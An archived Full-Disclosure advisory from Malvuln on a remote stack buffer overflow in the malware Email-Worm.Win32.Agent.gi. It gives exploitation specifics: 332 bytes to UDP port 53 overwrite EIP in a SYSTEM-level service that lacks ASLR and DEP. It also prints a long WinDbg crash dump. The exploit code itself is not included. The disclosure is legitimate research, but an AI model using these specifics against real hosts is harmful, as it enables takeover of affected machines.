lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAHK0WTw++h6u5JKom+o7B_BD-9U-OQLJfcmGerfSep1+DHNyA@mail.gmail.com>
Date: Mon, 18 Jan 2021 14:35:44 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Email-Worm.Win32.Agent.gi / Remote Stack Buffer Overflow -
	(UDP Datagram)

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/74e65773735f977185f6a09f1472ea46.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Email-Worm.Win32.Agent.gi
Vulnerability: Remote Stack Buffer Overflow - (UDP Datagram)
Description: Creates a service "Microsoft ASPI Manager" and listens on
TCP ports 80, 81 and UDP 53. The service process is a dropped
executable named aspimgr.exe that runs with SYSTEM integrity. Third
party attackers can send 332 bytes to UDP port 53 to overwrite the
instruction pointer (EIP) and possibly gain SYSTEM privileges.
The Exploit PoC uses the typical 41414141 pattern and 52525252 "R"
character for EIP overwrite.
Type: PE32
MD5: 74e65773735f977185f6a09f1472ea46
Vuln ID: MVID-2021-0036
Dropped files: aspimgr.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/18/2021

Memory Dump:
(1a78.e44): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=52525252 edx=773e9d70 esi=00000000 edi=00000000
eip=52525252 esp=03291450 ebp=03291470 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
52525252 ??              ???


0:007> !exchain
03291464: ntdll!ExecuteHandler2+44 (773e9d70)
03291a14: ntdll!ExecuteHandler2+44 (773e9d70)
03291fc4: ntdll!ExecuteHandler2+44 (773e9d70)
03292574: ntdll!ExecuteHandler2+44 (773e9d70)
03292b24: ntdll!ExecuteHandler2+44 (773e9d70)
032930d4: ntdll!ExecuteHandler2+44 (773e9d70)
03293684: ntdll!ExecuteHandler2+44 (773e9d70)
03293c34: ntdll!ExecuteHandler2+44 (773e9d70)
032941e4: ntdll!ExecuteHandler2+44 (773e9d70)
03294794: ntdll!ExecuteHandler2+44 (773e9d70)
03294d44: ntdll!ExecuteHandler2+44 (773e9d70)
032952f4: ntdll!ExecuteHandler2+44 (773e9d70)
032958a4: ntdll!ExecuteHandler2+44 (773e9d70)
03295e54: ntdll!ExecuteHandler2+44 (773e9d70)
03296404: ntdll!ExecuteHandler2+44 (773e9d70)
032969b4: ntdll!ExecuteHandler2+44 (773e9d70)
03296f64: ntdll!ExecuteHandler2+44 (773e9d70)
03297514: ntdll!ExecuteHandler2+44 (773e9d70)
03297ac4: ntdll!ExecuteHandler2+44 (773e9d70)
03298074: ntdll!ExecuteHandler2+44 (773e9d70)
03298624: ntdll!ExecuteHandler2+44 (773e9d70)
03298bd4: ntdll!ExecuteHandler2+44 (773e9d70)
03299184: ntdll!ExecuteHandler2+44 (773e9d70)
03299734: ntdll!ExecuteHandler2+44 (773e9d70)
03299ce4: ntdll!ExecuteHandler2+44 (773e9d70)
0329a294: ntdll!ExecuteHandler2+44 (773e9d70)
0329a844: ntdll!ExecuteHandler2+44 (773e9d70)
0329adf4: ntdll!ExecuteHandler2+44 (773e9d70)
0329b3a4: ntdll!ExecuteHandler2+44 (773e9d70)
0329b954: ntdll!ExecuteHandler2+44 (773e9d70)
0329bf04: ntdll!ExecuteHandler2+44 (773e9d70)
0329c4b4: ntdll!ExecuteHandler2+44 (773e9d70)
0329ca64: ntdll!ExecuteHandler2+44 (773e9d70)
0329d014: ntdll!ExecuteHandler2+44 (773e9d70)
0329d5c4: ntdll!ExecuteHandler2+44 (773e9d70)
0329db74: ntdll!ExecuteHandler2+44 (773e9d70)
0329e124: ntdll!ExecuteHandler2+44 (773e9d70)
0329e6d4: ntdll!ExecuteHandler2+44 (773e9d70)
0329ec84: ntdll!ExecuteHandler2+44 (773e9d70)
0329f234: ntdll!ExecuteHandler2+44 (773e9d70)
0329f7e4: ntdll!ExecuteHandler2+44 (773e9d70)
0329fd94: ntdll!ExecuteHandler2+44 (773e9d70)
032a0344: ntdll!ExecuteHandler2+44 (773e9d70)
032a08f4: ntdll!ExecuteHandler2+44 (773e9d70)
032a0ea4: ntdll!ExecuteHandler2+44 (773e9d70)
032a1454: ntdll!ExecuteHandler2+44 (773e9d70)
032a1a04: ntdll!ExecuteHandler2+44 (773e9d70)
032a1fb4: ntdll!ExecuteHandler2+44 (773e9d70)
032a2564: ntdll!ExecuteHandler2+44 (773e9d70)
032a2b14: ntdll!ExecuteHandler2+44 (773e9d70)
032a30c4: ntdll!ExecuteHandler2+44 (773e9d70)
032a3674: ntdll!ExecuteHandler2+44 (773e9d70)
032a3c24: ntdll!ExecuteHandler2+44 (773e9d70)
032a41d4: ntdll!ExecuteHandler2+44 (773e9d70)
032a4784: ntdll!ExecuteHandler2+44 (773e9d70)
032a4d34: ntdll!ExecuteHandler2+44 (773e9d70)
032a52e4: ntdll!ExecuteHandler2+44 (773e9d70)
032a5894: ntdll!ExecuteHandler2+44 (773e9d70)
032a5e44: ntdll!ExecuteHandler2+44 (773e9d70)
032a63f4: ntdll!ExecuteHandler2+44 (773e9d70)
032a69a4: ntdll!ExecuteHandler2+44 (773e9d70)
032a6f54: ntdll!ExecuteHandler2+44 (773e9d70)
032a7504: ntdll!ExecuteHandler2+44 (773e9d70)
032a7ab4: ntdll!ExecuteHandler2+44 (773e9d70)
032a8064: ntdll!ExecuteHandler2+44 (773e9d70)
032a8614: ntdll!ExecuteHandler2+44 (773e9d70)
032a8bc4: ntdll!ExecuteHandler2+44 (773e9d70)
032a9174: ntdll!ExecuteHandler2+44 (773e9d70)
032a9724: ntdll!ExecuteHandler2+44 (773e9d70)
032a9cd4: ntdll!ExecuteHandler2+44 (773e9d70)
032aa284: ntdll!ExecuteHandler2+44 (773e9d70)
032aa834: ntdll!ExecuteHandler2+44 (773e9d70)
032aade4: ntdll!ExecuteHandler2+44 (773e9d70)
032ab394: ntdll!ExecuteHandler2+44 (773e9d70)
032ab944: ntdll!ExecuteHandler2+44 (773e9d70)
032abef4: ntdll!ExecuteHandler2+44 (773e9d70)
032ac4a4: ntdll!ExecuteHandler2+44 (773e9d70)
032aca54: ntdll!ExecuteHandler2+44 (773e9d70)
032ad004: ntdll!ExecuteHandler2+44 (773e9d70)
032ad5b4: ntdll!ExecuteHandler2+44 (773e9d70)
032adb64: ntdll!ExecuteHandler2+44 (773e9d70)
032ae114: ntdll!ExecuteHandler2+44 (773e9d70)
032ae6c4: ntdll!ExecuteHandler2+44 (773e9d70)
032aec74: ntdll!ExecuteHandler2+44 (773e9d70)
032af224: ntdll!ExecuteHandler2+44 (773e9d70)
032af7d4: ntdll!ExecuteHandler2+44 (773e9d70)
032afd84: ntdll!ExecuteHandler2+44 (773e9d70)
032b0334: ntdll!ExecuteHandler2+44 (773e9d70)
032b08e4: ntdll!ExecuteHandler2+44 (773e9d70)
032b0e94: ntdll!ExecuteHandler2+44 (773e9d70)
032b1444: ntdll!ExecuteHandler2+44 (773e9d70)
032b19f4: ntdll!ExecuteHandler2+44 (773e9d70)
032b1fa4: ntdll!ExecuteHandler2+44 (773e9d70)
032b2554: ntdll!ExecuteHandler2+44 (773e9d70)
032b2b04: ntdll!ExecuteHandler2+44 (773e9d70)
032b30b4: ntdll!ExecuteHandler2+44 (773e9d70)
032b3664: ntdll!ExecuteHandler2+44 (773e9d70)
032b3c14: ntdll!ExecuteHandler2+44 (773e9d70)
032b41c4: ntdll!ExecuteHandler2+44 (773e9d70)
032b4774: ntdll!ExecuteHandler2+44 (773e9d70)
032b4d24: ntdll!ExecuteHandler2+44 (773e9d70)
032b52d4: ntdll!ExecuteHandler2+44 (773e9d70)
032b5884: ntdll!ExecuteHandler2+44 (773e9d70)
032b5e34: ntdll!ExecuteHandler2+44 (773e9d70)
032b63e4: ntdll!ExecuteHandler2+44 (773e9d70)
032b6994: ntdll!ExecuteHandler2+44 (773e9d70)
032b6f44: ntdll!ExecuteHandler2+44 (773e9d70)
032b74f4: ntdll!ExecuteHandler2+44 (773e9d70)
032b7aa4: ntdll!ExecuteHandler2+44 (773e9d70)
032b8054: ntdll!ExecuteHandler2+44 (773e9d70)
032b8604: ntdll!ExecuteHandler2+44 (773e9d70)
032b8bb4: ntdll!ExecuteHandler2+44 (773e9d70)
032b9164: ntdll!ExecuteHandler2+44 (773e9d70)
032b9714: ntdll!ExecuteHandler2+44 (773e9d70)
032b9cc4: ntdll!ExecuteHandler2+44 (773e9d70)
032ba274: ntdll!ExecuteHandler2+44 (773e9d70)
032ba824: ntdll!ExecuteHandler2+44 (773e9d70)
032badd4: ntdll!ExecuteHandler2+44 (773e9d70)
032bb384: ntdll!ExecuteHandler2+44 (773e9d70)
032bb934: ntdll!ExecuteHandler2+44 (773e9d70)
032bbee4: ntdll!ExecuteHandler2+44 (773e9d70)
032bc494: ntdll!ExecuteHandler2+44 (773e9d70)
032bca44: ntdll!ExecuteHandler2+44 (773e9d70)
032bcff4: ntdll!ExecuteHandler2+44 (773e9d70)
032bd5a4: ntdll!ExecuteHandler2+44 (773e9d70)
032bdb54: ntdll!ExecuteHandler2+44 (773e9d70)
032be104: ntdll!ExecuteHandler2+44 (773e9d70)
032be6b4: ntdll!ExecuteHandler2+44 (773e9d70)
032bec64: ntdll!ExecuteHandler2+44 (773e9d70)
032bf214: ntdll!ExecuteHandler2+44 (773e9d70)
032bf7c4: ntdll!ExecuteHandler2+44 (773e9d70)
032bfd74: ntdll!ExecuteHandler2+44 (773e9d70)
032c0324: ntdll!ExecuteHandler2+44 (773e9d70)
032c08d4: ntdll!ExecuteHandler2+44 (773e9d70)
032c0e84: ntdll!ExecuteHandler2+44 (773e9d70)
032c1434: ntdll!ExecuteHandler2+44 (773e9d70)
032c19e4: ntdll!ExecuteHandler2+44 (773e9d70)
032c1f94: ntdll!ExecuteHandler2+44 (773e9d70)
032c2544: ntdll!ExecuteHandler2+44 (773e9d70)
032c2af4: ntdll!ExecuteHandler2+44 (773e9d70)
032c30a4: ntdll!ExecuteHandler2+44 (773e9d70)
032c3654: ntdll!ExecuteHandler2+44 (773e9d70)
032c3c04: ntdll!ExecuteHandler2+44 (773e9d70)
032c41b4: ntdll!ExecuteHandler2+44 (773e9d70)
032c4764: ntdll!ExecuteHandler2+44 (773e9d70)
032c4d14: ntdll!ExecuteHandler2+44 (773e9d70)
032c52c4: ntdll!ExecuteHandler2+44 (773e9d70)
032c5874: ntdll!ExecuteHandler2+44 (773e9d70)
032c5e24: ntdll!ExecuteHandler2+44 (773e9d70)
032c63d4: ntdll!ExecuteHandler2+44 (773e9d70)
032c6984: ntdll!ExecuteHandler2+44 (773e9d70)
032c6f34: ntdll!ExecuteHandler2+44 (773e9d70)
032c74e4: ntdll!ExecuteHandler2+44 (773e9d70)
032c7a94: ntdll!ExecuteHandler2+44 (773e9d70)
032c8044: ntdll!ExecuteHandler2+44 (773e9d70)
032c85f4: ntdll!ExecuteHandler2+44 (773e9d70)
032c8ba4: ntdll!ExecuteHandler2+44 (773e9d70)
032c9154: ntdll!ExecuteHandler2+44 (773e9d70)
032c9704: ntdll!ExecuteHandler2+44 (773e9d70)
032c9cb4: ntdll!ExecuteHandler2+44 (773e9d70)
032ca264: ntdll!ExecuteHandler2+44 (773e9d70)
032ca814: ntdll!ExecuteHandler2+44 (773e9d70)
032cadc4: ntdll!ExecuteHandler2+44 (773e9d70)
032cb374: ntdll!ExecuteHandler2+44 (773e9d70)
032cb924: ntdll!ExecuteHandler2+44 (773e9d70)
032cbed4: ntdll!ExecuteHandler2+44 (773e9d70)
032cc484: ntdll!ExecuteHandler2+44 (773e9d70)
032cca34: ntdll!ExecuteHandler2+44 (773e9d70)
032ccfe4: ntdll!ExecuteHandler2+44 (773e9d70)
032cd594: ntdll!ExecuteHandler2+44 (773e9d70)
032cdb44: ntdll!ExecuteHandler2+44 (773e9d70)
032ce0f4: ntdll!ExecuteHandler2+44 (773e9d70)
032ce6a4: ntdll!ExecuteHandler2+44 (773e9d70)
032cec54: ntdll!ExecuteHandler2+44 (773e9d70)
032cf204: ntdll!ExecuteHandler2+44 (773e9d70)
032cf7b4: ntdll!ExecuteHandler2+44 (773e9d70)
032cfd64: ntdll!ExecuteHandler2+44 (773e9d70)
032d0314: ntdll!ExecuteHandler2+44 (773e9d70)
032d08c4: ntdll!ExecuteHandler2+44 (773e9d70)
032d0e74: ntdll!ExecuteHandler2+44 (773e9d70)
032d1424: ntdll!ExecuteHandler2+44 (773e9d70)
032d19d4: ntdll!ExecuteHandler2+44 (773e9d70)
032d1f84: ntdll!ExecuteHandler2+44 (773e9d70)
032d2534: ntdll!ExecuteHandler2+44 (773e9d70)
032d2ae4: ntdll!ExecuteHandler2+44 (773e9d70)
032d3094: ntdll!ExecuteHandler2+44 (773e9d70)
032d3644: ntdll!ExecuteHandler2+44 (773e9d70)
032d3bf4: ntdll!ExecuteHandler2+44 (773e9d70)
032d41a4: ntdll!ExecuteHandler2+44 (773e9d70)
032d4754: ntdll!ExecuteHandler2+44 (773e9d70)
032d4d04: ntdll!ExecuteHandler2+44 (773e9d70)
032d52b4: ntdll!ExecuteHandler2+44 (773e9d70)
032d5864: ntdll!ExecuteHandler2+44 (773e9d70)
032d5e14: ntdll!ExecuteHandler2+44 (773e9d70)
032d63c4: ntdll!ExecuteHandler2+44 (773e9d70)
032d6974: ntdll!ExecuteHandler2+44 (773e9d70)
032d6f24: ntdll!ExecuteHandler2+44 (773e9d70)
032d74d4: ntdll!ExecuteHandler2+44 (773e9d70)
032d7a84: ntdll!ExecuteHandler2+44 (773e9d70)
032d8034: ntdll!ExecuteHandler2+44 (773e9d70)
032d85e4: ntdll!ExecuteHandler2+44 (773e9d70)
032d8b94: ntdll!ExecuteHandler2+44 (773e9d70)
032d9144: ntdll!ExecuteHandler2+44 (773e9d70)
032d96f4: ntdll!ExecuteHandler2+44 (773e9d70)
032d9ca4: ntdll!ExecuteHandler2+44 (773e9d70)
032da254: ntdll!ExecuteHandler2+44 (773e9d70)
032da804: ntdll!ExecuteHandler2+44 (773e9d70)
032dadb4: ntdll!ExecuteHandler2+44 (773e9d70)
032db364: ntdll!ExecuteHandler2+44 (773e9d70)
032db914: ntdll!ExecuteHandler2+44 (773e9d70)
032dbec4: ntdll!ExecuteHandler2+44 (773e9d70)
032dc474: ntdll!ExecuteHandler2+44 (773e9d70)
032dca24: ntdll!ExecuteHandler2+44 (773e9d70)
032dcfd4: ntdll!ExecuteHandler2+44 (773e9d70)
032dd584: ntdll!ExecuteHandler2+44 (773e9d70)
032ddb34: ntdll!ExecuteHandler2+44 (773e9d70)
032de0e4: ntdll!ExecuteHandler2+44 (773e9d70)
032de694: ntdll!ExecuteHandler2+44 (773e9d70)
032dec44: ntdll!ExecuteHandler2+44 (773e9d70)
032df1f4: ntdll!ExecuteHandler2+44 (773e9d70)
032df7a4: ntdll!ExecuteHandler2+44 (773e9d70)
032dfd54: ntdll!ExecuteHandler2+44 (773e9d70)
032e0304: ntdll!ExecuteHandler2+44 (773e9d70)
032e08b4: ntdll!ExecuteHandler2+44 (773e9d70)
032e0e64: ntdll!ExecuteHandler2+44 (773e9d70)
032e1414: ntdll!ExecuteHandler2+44 (773e9d70)
032e19c4: ntdll!ExecuteHandler2+44 (773e9d70)
032e1f74: ntdll!ExecuteHandler2+44 (773e9d70)
032e2524: ntdll!ExecuteHandler2+44 (773e9d70)
032e2ad4: ntdll!ExecuteHandler2+44 (773e9d70)
032e3084: ntdll!ExecuteHandler2+44 (773e9d70)
032e3634: ntdll!ExecuteHandler2+44 (773e9d70)
032e3be4: ntdll!ExecuteHandler2+44 (773e9d70)
032e4194: ntdll!ExecuteHandler2+44 (773e9d70)
032e4744: ntdll!ExecuteHandler2+44 (773e9d70)
032e4cf4: ntdll!ExecuteHandler2+44 (773e9d70)
032e52a4: ntdll!ExecuteHandler2+44 (773e9d70)
032e5854: ntdll!ExecuteHandler2+44 (773e9d70)
032e5e04: ntdll!ExecuteHandler2+44 (773e9d70)
032e63b4: ntdll!ExecuteHandler2+44 (773e9d70)
032e6964: ntdll!ExecuteHandler2+44 (773e9d70)
032e6f14: ntdll!ExecuteHandler2+44 (773e9d70)
032e74c4: ntdll!ExecuteHandler2+44 (773e9d70)
032e7a74: ntdll!ExecuteHandler2+44 (773e9d70)
032e8024: ntdll!ExecuteHandler2+44 (773e9d70)
032e85d4: ntdll!ExecuteHandler2+44 (773e9d70)
032e8b84: ntdll!ExecuteHandler2+44 (773e9d70)
032e9134: ntdll!ExecuteHandler2+44 (773e9d70)
032e96e4: ntdll!ExecuteHandler2+44 (773e9d70)
032e9c94: ntdll!ExecuteHandler2+44 (773e9d70)
032ea244: ntdll!ExecuteHandler2+44 (773e9d70)
032ea7f4: ntdll!ExecuteHandler2+44 (773e9d70)
032eada4: ntdll!ExecuteHandler2+44 (773e9d70)
032eb354: ntdll!ExecuteHandler2+44 (773e9d70)
032eb904: ntdll!ExecuteHandler2+44 (773e9d70)
032ebeb4: ntdll!ExecuteHandler2+44 (773e9d70)
032ec464: ntdll!ExecuteHandler2+44 (773e9d70)
032eca14: ntdll!ExecuteHandler2+44 (773e9d70)
032ecfc4: ntdll!ExecuteHandler2+44 (773e9d70)
032ed574: ntdll!ExecuteHandler2+44 (773e9d70)
032edb24: ntdll!ExecuteHandler2+44 (773e9d70)
032ee0d4: ntdll!ExecuteHandler2+44 (773e9d70)
032ee684: ntdll!ExecuteHandler2+44 (773e9d70)
032eec34: ntdll!ExecuteHandler2+44 (773e9d70)
032ef1e4: ntdll!ExecuteHandler2+44 (773e9d70)
032ef794: ntdll!ExecuteHandler2+44 (773e9d70)
032efd44: ntdll!ExecuteHandler2+44 (773e9d70)
032f02f4: ntdll!ExecuteHandler2+44 (773e9d70)
032f08a4: ntdll!ExecuteHandler2+44 (773e9d70)
032f0e54: ntdll!ExecuteHandler2+44 (773e9d70)
032f1404: ntdll!ExecuteHandler2+44 (773e9d70)
032f19b4: ntdll!ExecuteHandler2+44 (773e9d70)
032f1f64: ntdll!ExecuteHandler2+44 (773e9d70)
032f2514: ntdll!ExecuteHandler2+44 (773e9d70)
032f2ac4: ntdll!ExecuteHandler2+44 (773e9d70)
032f3074: ntdll!ExecuteHandler2+44 (773e9d70)
032f3624: ntdll!ExecuteHandler2+44 (773e9d70)
032f3bd4: ntdll!ExecuteHandler2+44 (773e9d70)
032f4184: ntdll!ExecuteHandler2+44 (773e9d70)
032f4734: ntdll!ExecuteHandler2+44 (773e9d70)
032f4ce4: ntdll!ExecuteHandler2+44 (773e9d70)
032f5294: ntdll!ExecuteHandler2+44 (773e9d70)
032f5844: ntdll!ExecuteHandler2+44 (773e9d70)
032f5df4: ntdll!ExecuteHandler2+44 (773e9d70)
032f63a4: ntdll!ExecuteHandler2+44 (773e9d70)
032f6954: ntdll!ExecuteHandler2+44 (773e9d70)
032f6f04: ntdll!ExecuteHandler2+44 (773e9d70)
032f74b4: ntdll!ExecuteHandler2+44 (773e9d70)
032f7a64: ntdll!ExecuteHandler2+44 (773e9d70)
032f8014: ntdll!ExecuteHandler2+44 (773e9d70)
032f85c4: ntdll!ExecuteHandler2+44 (773e9d70)
032f8b74: ntdll!ExecuteHandler2+44 (773e9d70)
032f9124: ntdll!ExecuteHandler2+44 (773e9d70)
032f96d4: ntdll!ExecuteHandler2+44 (773e9d70)
032f9c84: ntdll!ExecuteHandler2+44 (773e9d70)
032fa234: ntdll!ExecuteHandler2+44 (773e9d70)
032fa7e4: ntdll!ExecuteHandler2+44 (773e9d70)
032fad94: ntdll!ExecuteHandler2+44 (773e9d70)
032fb344: ntdll!ExecuteHandler2+44 (773e9d70)
032fb8f4: ntdll!ExecuteHandler2+44 (773e9d70)
032fbea4: ntdll!ExecuteHandler2+44 (773e9d70)
032fc454: ntdll!ExecuteHandler2+44 (773e9d70)
032fca04: ntdll!ExecuteHandler2+44 (773e9d70)
032fcfb4: ntdll!ExecuteHandler2+44 (773e9d70)
032fd564: ntdll!ExecuteHandler2+44 (773e9d70)
032fdb14: ntdll!ExecuteHandler2+44 (773e9d70)
032fe0c4: ntdll!ExecuteHandler2+44 (773e9d70)
032fe674: ntdll!ExecuteHandler2+44 (773e9d70)
032fec24: ntdll!ExecuteHandler2+44 (773e9d70)
032ff1d4: ntdll!ExecuteHandler2+44 (773e9d70)
032ff784: ntdll!ExecuteHandler2+44 (773e9d70)
032ffd34: ntdll!ExecuteHandler2+44 (773e9d70)
033002e4: ntdll!ExecuteHandler2+44 (773e9d70)
03300894: ntdll!ExecuteHandler2+44 (773e9d70)
03300e44: ntdll!ExecuteHandler2+44 (773e9d70)
033013f4: ntdll!ExecuteHandler2+44 (773e9d70)
033019a4: ntdll!ExecuteHandler2+44 (773e9d70)
03301f54: ntdll!ExecuteHandler2+44 (773e9d70)
03302504: ntdll!ExecuteHandler2+44 (773e9d70)
03302ab4: ntdll!ExecuteHandler2+44 (773e9d70)
03303064: ntdll!ExecuteHandler2+44 (773e9d70)
03303614: ntdll!ExecuteHandler2+44 (773e9d70)
03303bc4: ntdll!ExecuteHandler2+44 (773e9d70)
03304174: ntdll!ExecuteHandler2+44 (773e9d70)
03304724: ntdll!ExecuteHandler2+44 (773e9d70)
03304cd4: ntdll!ExecuteHandler2+44 (773e9d70)
03305284: ntdll!ExecuteHandler2+44 (773e9d70)
03305834: ntdll!ExecuteHandler2+44 (773e9d70)
03305de4: ntdll!ExecuteHandler2+44 (773e9d70)
03306394: ntdll!ExecuteHandler2+44 (773e9d70)
03306944: ntdll!ExecuteHandler2+44 (773e9d70)
03306ef4: ntdll!ExecuteHandler2+44 (773e9d70)
033074a4: ntdll!ExecuteHandler2+44 (773e9d70)
03307a54: ntdll!ExecuteHandler2+44 (773e9d70)
03308004: ntdll!ExecuteHandler2+44 (773e9d70)
033085b4: ntdll!ExecuteHandler2+44 (773e9d70)
03308b64: ntdll!ExecuteHandler2+44 (773e9d70)
03309114: ntdll!ExecuteHandler2+44 (773e9d70)
033096c4: ntdll!ExecuteHandler2+44 (773e9d70)
03309c74: ntdll!ExecuteHandler2+44 (773e9d70)
0330a224: ntdll!ExecuteHandler2+44 (773e9d70)
0330a7d4: ntdll!ExecuteHandler2+44 (773e9d70)
0330ad84: ntdll!ExecuteHandler2+44 (773e9d70)
0330b334: ntdll!ExecuteHandler2+44 (773e9d70)
0330b8e4: ntdll!ExecuteHandler2+44 (773e9d70)
0330be94: ntdll!ExecuteHandler2+44 (773e9d70)
0330c444: ntdll!ExecuteHandler2+44 (773e9d70)
0330c9f4: ntdll!ExecuteHandler2+44 (773e9d70)
0330cfa4: ntdll!ExecuteHandler2+44 (773e9d70)
0330d554: ntdll!ExecuteHandler2+44 (773e9d70)
0330db04: ntdll!ExecuteHandler2+44 (773e9d70)
0330e0b4: ntdll!ExecuteHandler2+44 (773e9d70)
0330e664: ntdll!ExecuteHandler2+44 (773e9d70)
0330ec14: ntdll!ExecuteHandler2+44 (773e9d70)
0330f1c4: ntdll!ExecuteHandler2+44 (773e9d70)
0330f774: ntdll!ExecuteHandler2+44 (773e9d70)
0330fd24: ntdll!ExecuteHandler2+44 (773e9d70)
033102d4: ntdll!ExecuteHandler2+44 (773e9d70)
03310884: ntdll!ExecuteHandler2+44 (773e9d70)
03310e34: ntdll!ExecuteHandler2+44 (773e9d70)
033113e4: ntdll!ExecuteHandler2+44 (773e9d70)
03311994: ntdll!ExecuteHandler2+44 (773e9d70)
03311f44: ntdll!ExecuteHandler2+44 (773e9d70)
033124f4: ntdll!ExecuteHandler2+44 (773e9d70)
03312aa4: ntdll!ExecuteHandler2+44 (773e9d70)
03313054: ntdll!ExecuteHandler2+44 (773e9d70)
03313604: ntdll!ExecuteHandler2+44 (773e9d70)
03313bb4: ntdll!ExecuteHandler2+44 (773e9d70)
03314164: ntdll!ExecuteHandler2+44 (773e9d70)
03314714: ntdll!ExecuteHandler2+44 (773e9d70)
03314cc4: ntdll!ExecuteHandler2+44 (773e9d70)
03315274: ntdll!ExecuteHandler2+44 (773e9d70)
03315824: ntdll!ExecuteHandler2+44 (773e9d70)
03315dd4: ntdll!ExecuteHandler2+44 (773e9d70)
03316384: ntdll!ExecuteHandler2+44 (773e9d70)
03316934: ntdll!ExecuteHandler2+44 (773e9d70)
03316ee4: ntdll!ExecuteHandler2+44 (773e9d70)
03317494: ntdll!ExecuteHandler2+44 (773e9d70)
03317a44: ntdll!ExecuteHandler2+44 (773e9d70)
03317ff4: ntdll!ExecuteHandler2+44 (773e9d70)
033185a4: ntdll!ExecuteHandler2+44 (773e9d70)
03318b54: ntdll!ExecuteHandler2+44 (773e9d70)
03319104: ntdll!ExecuteHandler2+44 (773e9d70)
033196b4: ntdll!ExecuteHandler2+44 (773e9d70)
03319c64: ntdll!ExecuteHandler2+44 (773e9d70)
0331a214: ntdll!ExecuteHandler2+44 (773e9d70)
0331a7c4: ntdll!ExecuteHandler2+44 (773e9d70)
0331ad74: ntdll!ExecuteHandler2+44 (773e9d70)
0331b324: ntdll!ExecuteHandler2+44 (773e9d70)
0331b8d4: ntdll!ExecuteHandler2+44 (773e9d70)
0331be84: ntdll!ExecuteHandler2+44 (773e9d70)
0331c434: ntdll!ExecuteHandler2+44 (773e9d70)
0331c9e4: ntdll!ExecuteHandler2+44 (773e9d70)
0331cf94: ntdll!ExecuteHandler2+44 (773e9d70)
0331d544: ntdll!ExecuteHandler2+44 (773e9d70)
0331daf4: ntdll!ExecuteHandler2+44 (773e9d70)
0331e0a4: ntdll!ExecuteHandler2+44 (773e9d70)
0331e654: ntdll!ExecuteHandler2+44 (773e9d70)
0331ec04: ntdll!ExecuteHandler2+44 (773e9d70)
0331f1b4: ntdll!ExecuteHandler2+44 (773e9d70)
0331f764: ntdll!ExecuteHandler2+44 (773e9d70)
0331fd14: ntdll!ExecuteHandler2+44 (773e9d70)
033202c4: ntdll!ExecuteHandler2+44 (773e9d70)
03320874: ntdll!ExecuteHandler2+44 (773e9d70)
03320e24: ntdll!ExecuteHandler2+44 (773e9d70)
033213d4: ntdll!ExecuteHandler2+44 (773e9d70)
03321984: ntdll!ExecuteHandler2+44 (773e9d70)
03321f34: ntdll!ExecuteHandler2+44 (773e9d70)
033224e4: ntdll!ExecuteHandler2+44 (773e9d70)
03322a94: ntdll!ExecuteHandler2+44 (773e9d70)
03323044: ntdll!ExecuteHandler2+44 (773e9d70)
033235f4: ntdll!ExecuteHandler2+44 (773e9d70)
03323ba4: ntdll!ExecuteHandler2+44 (773e9d70)
03324154: ntdll!ExecuteHandler2+44 (773e9d70)
03324704: ntdll!ExecuteHandler2+44 (773e9d70)
03324cb4: ntdll!ExecuteHandler2+44 (773e9d70)
03325264: ntdll!ExecuteHandler2+44 (773e9d70)
03325814: ntdll!ExecuteHandler2+44 (773e9d70)
03325dc4: ntdll!ExecuteHandler2+44 (773e9d70)
03326374: ntdll!ExecuteHandler2+44 (773e9d70)
03326924: ntdll!ExecuteHandler2+44 (773e9d70)
03326ed4: ntdll!ExecuteHandler2+44 (773e9d70)
03327484: ntdll!ExecuteHandler2+44 (773e9d70)
03327a34: ntdll!ExecuteHandler2+44 (773e9d70)
03327fe4: ntdll!ExecuteHandler2+44 (773e9d70)
03328594: ntdll!ExecuteHandler2+44 (773e9d70)
03328b44: ntdll!ExecuteHandler2+44 (773e9d70)
033290f4: ntdll!ExecuteHandler2+44 (773e9d70)
033296a4: ntdll!ExecuteHandler2+44 (773e9d70)
03329c54: ntdll!ExecuteHandler2+44 (773e9d70)
0332a204: ntdll!ExecuteHandler2+44 (773e9d70)
0332a7b4: ntdll!ExecuteHandler2+44 (773e9d70)
0332ad64: ntdll!ExecuteHandler2+44 (773e9d70)
0332b314: ntdll!ExecuteHandler2+44 (773e9d70)
0332b8c4: ntdll!ExecuteHandler2+44 (773e9d70)
0332be74: ntdll!ExecuteHandler2+44 (773e9d70)
0332c424: ntdll!ExecuteHandler2+44 (773e9d70)
0332c9d4: ntdll!ExecuteHandler2+44 (773e9d70)
0332cf84: ntdll!ExecuteHandler2+44 (773e9d70)
0332d534: ntdll!ExecuteHandler2+44 (773e9d70)
0332dae4: ntdll!ExecuteHandler2+44 (773e9d70)
0332e094: ntdll!ExecuteHandler2+44 (773e9d70)
0332e644: ntdll!ExecuteHandler2+44 (773e9d70)
0332ebf4: ntdll!ExecuteHandler2+44 (773e9d70)
0332f1a4: ntdll!ExecuteHandler2+44 (773e9d70)
0332f754: ntdll!ExecuteHandler2+44 (773e9d70)
0332fd04: ntdll!ExecuteHandler2+44 (773e9d70)
033302b4: ntdll!ExecuteHandler2+44 (773e9d70)
03330864: ntdll!ExecuteHandler2+44 (773e9d70)
03330e14: ntdll!ExecuteHandler2+44 (773e9d70)
033313c4: ntdll!ExecuteHandler2+44 (773e9d70)
03331974: ntdll!ExecuteHandler2+44 (773e9d70)
03331f24: ntdll!ExecuteHandler2+44 (773e9d70)
033324d4: ntdll!ExecuteHandler2+44 (773e9d70)
03332a84: ntdll!ExecuteHandler2+44 (773e9d70)
03333034: ntdll!ExecuteHandler2+44 (773e9d70)
033335e4: ntdll!ExecuteHandler2+44 (773e9d70)
03333b94: ntdll!ExecuteHandler2+44 (773e9d70)
